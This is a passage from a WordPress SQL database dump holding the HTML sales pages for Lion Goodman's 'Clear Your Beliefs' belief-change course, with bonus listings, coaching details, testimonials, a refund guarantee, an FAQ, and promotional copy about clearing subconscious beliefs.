(from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'KG', '', 'publish', 'closed', 'closed', '', 'kg', '', '', '2015-08-06 00:24:09', '2015-08-06 05:24:09', '', 2233, 'http://clearyourbeliefs.com/?page_id=2236', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2237, 2, '2015-08-06 00:24:50', '2015-08-06 05:24:50', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" 